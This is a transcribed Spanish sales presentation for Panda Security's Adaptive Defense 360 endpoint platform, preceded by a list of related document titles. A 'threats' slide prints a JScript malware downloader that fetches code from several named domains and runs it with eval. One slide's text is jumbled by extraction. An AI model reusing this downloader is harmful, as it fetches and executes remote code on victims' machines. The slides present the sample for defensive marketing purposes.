ADAPTIVE DEFENSE 360. PLATAFORMA DE CIBERSEGURIDAD INTELIGENTE Visibilidad sin limites Control absoluto

Documentos relacionados
Desarrollo de Producto Sistemas de Seguridad basados en Cloud Computing. Jorge Peñalva Director Marketing

Guía Práctica de Seguridad para Prevenir la Ciberextorsión

Seguridad Perimetral. Mg. Ing. M. Angélica Castillo Ríos Jefa de la Oficina de Sistemas PCM

ESET SMART SECURITY CONTACT CENTER LINEA 177

Protección e inteligencia unificadas contra las amenazas avanzadas y el robo de datos

Lucio Adame / Henoch Barrera 4 de diciembre 2014

POLICÍA NACIONAL DEL ECUADOR DIRECCIÓN NACIONAL DE COMUNICACIONES

Telefónica Soluciones SOC Grandes Clientes. Seguridad desde la Red

BVS Cloud Web Security

Puntos Importantes para Seleccionar una Protección Confiable Para sus Endpoints

Forcepoint AVANCE SIN MIEDO

Productividad y eficiencia de una forma segura y fiable

TREND MICRO SMART PROTECTION SUITES

MONITORIZACIÓN Y VIGILANCIA COMO ELEMENTOS CLAVE EN LA PREVENCIÓN DEL DELITO

Está su seguridad realmente segura?

TRITON AP- DETENGA LOS ATAQUES AVANZADOS DIRIGIDOS A SU EMPRESA, IDENTIFIQUE A LOS USUARIOS DE ALTO RIESGO Y CONTROLE LAS AMENAZAS INTERNAS

Reporte de Seguridad Web Eduardo Rico Systems Engineer Blue Coat Systems, Inc.

Principios Básicos de Seguridad en Bases de Datos

Cisco Advanced Malware Protection. Jorge Hormigos Consulting Systems Engineer Diciembre 2016

POLICÍA FEDERAL DIVISIÓN CIENTÍFICA ROBO DE IDENTIDAD EN INTERNET: USO INDEBIDO DE DATOS PERSONALES

ANTIVIRUS TOOLS INTEGRANTES: RAMIREZ GARCIA BLANCA SILVIA ESLAVA FLORES VICTOR GRUPO: 5 ºNP

Manual de Adaptive Defense

TRITON AP-WEB PROTECCIÓN COMPLETA EN TIEMPO REAL CONTRA AMENAZAS AVANZADAS Y ROBO DE DATOS

Acelere las acciones de hoy mientras anticipa las de mañana con la información adecuada

Presentada por: Enrique Lannes Gerente de Ventas America Latina

Está su seguridad realmente segura? Carlos Echeverría Lizarralde Director de Canales para Latam

LA CARRERA DE LA CIBER-SEGURIDAD

ATAQUES DIRIGIDOS Y CIBER FRAUDE DE LA FICCION A LA REALIDAD. Título de la sesión

TRITON AP-ENDPOINT DETENGA LAS AMENAZAS AVANZADAS Y PROTEJA LA INFORMACIÓN CONFIDENCIAL DE LOS USUARIOS REMOTOS

ADMINISTRACIÓN DE LA SEGURIDAD PERIMETRAL EN REDES LAN. Ing. Mg. Miguel Ángel Valles Coral.

Seguridad Informática en Bibliotecas

Servicios desde la nube: Seguridad gestionada de dispositivos móviles, una ayuda a la movilidad en el entorno de trabajo

Navegando al Día. Publicado en Revista.Seguridad ( Inicio > Navegando al Día. Por David Eduardo Bernal Michelena

Vulnerabilidad de Empresas en Ciberseguridad Noviembre 2016

Cinco requisitos. Cuándo considerar la seguridad de los correos electrónicos

Además, debido al incremento del parque informático actual se requiere aumentar la cantidad de licencias, ya que a la fecha resulta insuficiente.

Cinco pasos para la protección contra malware avanzado: una realidad de Cisco

Sophos Complete Security in an Enterprise

ADMINISTRACIÓN DE SERVIDORES BAJO WINDOWS 2012 MS20410: Instalando y Configurando Windows Server 2012

CYBERGYM #CG002 SPA SERVICIOS INTEGRALES DE DEFENSA CIBERNÉTICA

Big Data para Inteligencia Criminal

Seguridad en internet. La seguridad

Cómo ganar dinero con los datos de tu empresa? Impacto de la falta de seguridad en el negocio

2. Tipos de protección que hay actualmente (utiliza puntos). -Antivirus y cortafuegos.

Lavalle 381 piso 3º C1047AAG Ciudad Autónoma de Buenos Aires - ARGENTINA Tel: (5411) Fax: (5411)

Problemas de Seguridad Comunes en la UNAM. M.A. Manuel Quintero Ing. Demian García

FACILITANDO RESPUESTAS RÁPIDAS A LOS INCIDENTES DE SEGURIDAD CON EL MONITOREO DE AMENAZAS

Medidas de seguridad. Tema 1 SAD. Vicente Sánchez Patón. I.E.S Gregorio Prieto

Universidad Autónoma del Estado de México ADMINISTRACIÓN Y SEGURIDAD EN SISTEMAS OPERATIVOS SEGURIDAD SOBRE WINDOWS POR: J. JAIR VÁZQUEZ PALMA

Soluciones Tecnológicas Integrales

Protección de Contenidos en el Perímetro de la Red White Paper. La Importancia de Proteger el Perímetro

Nota Técnica (MDTPointCloud_es_v1_ext01_Photoscan) Explotación de Resultados de Agisoft Photoscan con MDT Point Cloud

COMPARATIVA DE PRODUCTOS

Routers y Switches Pequeña Empresa

LOCKY: NUEVO RANSOMWARE CON CARACTERÍSTICAS COMUNES AL TROYANO BANCARIO DRIDEX

Guía del Curso UF1353 Monitorización de los Accesos al Sistema Informático

Servicios de Seguridad Gestionada 2.0 Evolución natural del software como servicio

GESTIÓN DE INCIDENTES DE SEGURIDAD INFORMÁTICA

Cisco Advanced Malware Protection

Preguntas más frecuentes sobre Symantec. Qué es Symantec Endpoint Protection Small Business Edition 2013?

El Enemigo Está Dentro Impacto de la Falta de Seguridad en el Negocio

Tecnología Safe Money

IBM Security Systems. QRadar, Plataforma de inteligencia de seguridad (SIEM) QRadar Log Manager

Configuración de Kaspersky Endpoint Security 10 SP1

Wifi con Gestión cloud (WiFiaaS)

Guía práctica Windows 7 Registro y configuración Francisco Charte Ojeda

Proteger tu negocio. Microsoft. Empresa moderna. Kenny Cuc. experience day. Presales Mgr - Grupo Sega 8 de marzo, EMPOWERED by D I G I T A L

Informe ransomware

Servicio de Protección Total Web

Telefónica, el líder de la Ciberseguridad en España

Comparative Study of the Effectiveness of Intrusion Detection Systems

Soluciones BYOD para el aula. 24.Febrero.2016

La migración de información hacia plataformas digitales, abiertas e interconectadas hace de la seguridad informática un asunto crítico de negocio.

Protección frente a malware avanzado de Cisco

Web Cash Mejores Prácticas para Evitar Fraude

Guía de Instalación. Antivirus Infinitum

Curso de Experto en. Inicio OCTUBRE 2016 INFORMACIÓN Y RESERVA DE PLAZA: ,

Primera respuesta: antes de que llegue la policía. Luis A. Gorgona S. Csirt-CR

CONSOLIDACIÓN DE SOLUCIONES Y BLINDAJE DE SEGURIDAD INFORMÁTICA COMPLETO CON PANDA SECURITY EN DIPUTACIÓN DE CÁDIZ

Seguridad web: Proteja sus datos en la nube

1. Prólogo Introducción A quién está dirigida esta guía? Iconos... 11

Best Practices for controlling Advanced Threats and their Persistence. Matthew Ancelin Cybersecurity Analyst

Avanzada 2020 REFERENCIAS DE OFERTA TEIC BI 4.0 EUSKALTEL

Advanced Malware Protection: una guía para el comprador

Kaspersky Anti-Virus 2012 Kaspersky Internet Security 2012

Panda Managed Office Protection Visita a la Consola web de Administración

Symantec Mobile Security

1.4.1 Inicio de la computadora por primera vez Hay problemas Causas, síntomas y soluciones a posibles averías...

Kaspersky Fraud Prevention for Endpoints

Avanzada MANUFACTURING INTELLIGENCE. Fábrica digital y humana Caso práctico: Vicrila SISTEPLANT. José Bartolomé Zavala Operations Manager

Detenga las amenazas avanzadas y proteja la información confidencial de los usuarios remotos

ESET SMART SECURITY PREMIUM 10. Microsoft Windows 10 / 8.1 / 8 / 7 / Vista

Administración de dispositivos móviles

CONCEPTOS BÁSICOS Y SISTEMA OPERATIVO

MS_20696 Managing Enterprise Devices and Apps using System Center Configuration Manager

MS_10962 Advanced Automated Administration with Windows PowerShell

ESET NOD32 ANTIVIRUS 10

Seguridad. Inteligencia conectada. Rendimiento.

DEFINICIÓN. Fuente de imagen: ica.blogspot.com.es/2015/03/ley delitos-informaticos.html

Transcripción:

ADAPTIVE DEFENSE 360 PLATAFORMA DE CIBERSEGURIDAD INTELIGENTE Visibilidad sin limites Control absoluto Shinue Salas Perez Presales Manager shinue.salas@mx.pandasecurity.com

AMENAZAS <job><script language=jscript>var x = new Array("wagafashion.in","www.ezgidemirer.c om.tr","theamyday.com","retraperm.ru","besthunts.net"); var m = "7479309"; for (var i=0; i<5; i++) { try { var e = new ActiveXObject("Msxml2.XMLHTTP"); e.open("get", "http://"+x[i]+"/counter/?a=1c6xgej9mbdu Hya2YuUDyKxQCFQA7Wuy9n&m="+m+"&i= LZZ_6haseqDv5EoCDLd5- Ya94ortRlZ6ffAJaPd3n8_G5QP5ISaNywuImo IDEGKzpKBoN_pAGumkNQv_BGspV622Ska BNig8", false); e.send(); if (e.status == 200) { eval(e.responsetext.split(m).join("a")); break; }; } catch(e) { }; };</script></job

CADENA DE ATAQUE Adversarios Equipo de Seguridad / IT 1. RECONOCIMIENTO Identifcar Objetivo 2. ARMAMENTIZACIÓN Preparando el ataque 3. ENTREGA Inicia la operación 4. EXPLOTACIÓN Acceso a las victimas 5. INSTALACIÓN Colocación en el equipo de la Victima 6. COMANDO & CONTROL (C&C/C2) Control Remoto de lo Implantado 7. ACCIONES EN EL OBJETIVO Afectación Adaptive Defense

PROTECCIÓN? Para ser realmente eficaz, una solución debe proporcionar protección continua contra todo tipo de ataques.

EVOLUCION DEL ENDPOINT Generación Tradicional Generación Actual Siguiente Generación Trabajó bien con amenazas estáticas. Centrado en malware basado en archivos Protección limitada contra día 0. Mala visibilidad en el Endpoint. No tiene capacidades de detección de comportamiento. Detección 0 contra malware sin archivos. Visibilidad limitada en los procesos de ejecución del usuario. Detección de comportamiento basada en procesos. Funciones aisladas de prevención, deteccíón y respuesta. Gestionados AV Gratis Endpoint Security Evolution AV Corporativo

Es el primer servicio de ciberseguridad que combina una protección de última generación (NG EPP) y tecnologías de detección y remediación (EDR), con la capacidad de clasificar el 100% de los procesos en ejecución.

INTELIGENCIA CONTEXTUAL Malware Endpoint Next-Generation Intelligence Detection Endpoint and Platform Response Security Conecta Monitoriza, Analiza y con recopila correlaciona Operaciones y clasifica toda de el la 100% Inteligencia información de los Contextual procesos generada activos por para las en amenazas los anticipar endpoints que de conectan la comportamiento organización. varias malicioso fuentes de y datos filtraciones en tiempo de real. datos. Para activar los sistemas Acciones de para protección Detectar, antes bloquear, de ejecutar amenazas. investigar y remediar Descubrir amenazas. patrones de comportamiento malicioso Diseñada y generar acciones para proteger avanzadas contra de seguridad, amenazas para avanzadas Seguimiento adelantarse y persistentes al análisis malware de información (APTs), y eliminar ataques fluye amenazas dirigidos, por la ransomware. red avanzadas. para adelantarse a la fuga de datos y otras actividades maliciosas. Inteligencia Contextual

SOLUCIONES TRADICIONALES VS AD 360 Malware Sospechosos Trabajo Antivirus tradicionales (conocen el malware pero desconocen todo lo demás)? Riesgo Malware En Clasificado investigación Servicio gestionado Adaptive Defense (monitorización de todos los procesos en ejecución para clasificarlos todos) Goodware Objetivo: Riesgo 0

CONTROL ABSOLUTO ANALISIS, CATEGORIZACIÓN Y CORRELACIÓN DE DATOS DE AMENAZAS Inteligencia Contextual

ANTICIPANDONOS AL MALWARE Clasificación Automática Clasificar cada una de las aplicaciones de la organización mediante técnicas de Machine Learning en una plataforma Cloud Big Data. Impedir Ejecución Todo elemento desconocido en el contexto es encapsulado y analizado antes de efectuar alguna acción en el sistema. Monitorización Continua De todo lo que sucede en los equipos de la organización..

CONTROLAR LO QUE SUCEDE Detectar Fuga de Información Tanto si viene del malware como de tus empleados. Descubrir y Solucionar Brechas En tus sistemas y aplicaciones, y prevenir el uso de programas no deseados como barras de navegadores, adware o add-ons. Bloquear Cualquier ataque dirigido a tus sistemas.

VISIBILIDAD TOTAL VEMOS LO QUE OTROS NO VEN VISIBILIDAD TOTAL

SABES LO QUE ESTAS BUSCANDO?

VISIBILIDAD Identificación de acciones clave: Acceso a Datos, Conexiones, Ejecución.

TRAZABILIDAD Registro de cada una de las acciones efectuadas por los elementos en los sistema. Información para investigar en profundidad cada intento de ataque. Elementos, acciones, conexiones son trazadas por las amenazas a través del tiempo.

FACIL MANEJO Dashboard Alertas predefinidas y personalizables. Fácil búsqueda y manejo de datos. Incidentes de Seguridad, Control de Aplicaciones, Acceso a Datos.

GEOLOCALIZACIÓN Conexiones Salientes Puerto, Protocolo, Sentido. Países o Coordenadas URL de Descarga y Archivos Descargados.

INFORMACIÓN Quien? Donde? Cuando? Que?

EL RIESGO DEL FACTOR HUMANO PROTEGIENDO A LOS USUARIOS Factor Humano

VICTIMAS

PROTEGER AL ESLABÓN MÁS DÉBIL DDoS Red DDoS Aplicación Control Accesos Firewall App, Recursos, Servicios Seguridad Web Firewall de Aplicaciones Web Usuario

CON ADAPTIVE DEFENSE 360 Comprometido Infectado Vulnerado Explotado Secuestrado Riesgo de Factor Humano

CON ADAPTIVE DEFENSE 360 Visibilidad de lo que sucede en el Endpoint. Servicio Gestionado y Personalizado. Plataforma Cloud Monitorización Continua Protección dentro y fuera de la red.

ESTADISTICAS Categorizado mas de 3.5 millones de aplicaciones hasta ahora. Detección de malware en el 100% de los entornos en los que ha sido instalado, independientemente de las soluciones de seguridad que ya se tenían instaladas. Diariamente analiza, correlaciona y categoriza mas de 1TB de información de todo tipo de ciber-amenazas. Ningún dispositivo comprometido.

Gracias